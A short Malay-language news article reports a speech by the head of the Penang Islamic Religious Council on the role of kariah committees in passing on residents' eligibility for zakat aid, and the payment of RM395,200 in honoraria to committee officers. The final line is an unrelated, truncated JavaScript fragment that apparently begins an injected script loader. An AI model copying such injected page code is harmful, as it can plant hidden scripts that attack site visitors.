Peranan Jawatankuasa Kariah bukan di masjid sahaja – YDP MAINPP

BERTAM – Yang di-Pertua Majlis Agama Islam Negeri Pulau Pinang (MAINPP), Dato’ Mohd. Salleh Man berkata, peranan sebenar Jawatankuasa Kariah antaranya termasuk menyalurkan maklumat anak-anak kariah yang layak dipertimbang untuk menerima bantuan asnaf daripada Zakat Pulau Pinang (ZPP).

Justeru, kata beliau, mereka yang dilantik wajar lebih prihatin dengan perihal kebajikan anak-anak kariah sama ada yang sering berkunjung ke masjid atau sebaliknya.

“Kadang-kadang ada anak kariah yang layak mendapat bantuan zakat, tetapi maklumat mereka ini tidak sampai kepada kita (ZPP) kerana jarang nampak (bersolat jamaah) di masjid.

“Sebab itu, kita sebut Jawatankuasa Kariah, kita tak sebut Jawatankuasa Masjid sebab banyak perkara sepatutnya dimainkan oleh jawatankuasa ini meliputi tiap-tiap anak Kariah, bukan hanya meliputi mereka yang datang ke masjid sahaja,” katanya pada Majlis Bayaran Saguhati Pengurusan Kariah 2014 di sini baru-baru ini.

Timbalan Yang di-Pertua MAINPP, Datuk Abdul Halim Hussain dan Ustaz Rosidi Hussain (Pengerusi Jawatankuasa Pengurusan Masjid & Hal Ehwal Kariah MAINPP) turut berucap pada majlis tersebut.

Mohd. Salleh yang juga Ahli Dewan Undangan Negeri (ADUN) Permatang Pasir menyampaikan bayaran saguhati daripada sumber zakat kepada 791 penerima dari 207 kariah yang keseluruhannya berjumlah RM395,200.

Difahamkan, penerima terdiri oleh pengerusi, timbalan pengerusi, setiausaha dan bendahari bagi tiap-tiap jawatankuasa kariah yang dilantik.

Sebelum itu, Rosidi memberitahu bahawa jawatankuasanya akan menguruskan proses melanjutkan tempoh pelantikan Jawatankuasa Kariah yang sepatutnya pada bulan Jun tahun ini ke April 2016.

var d=document;var s=d.createElement(‘script’);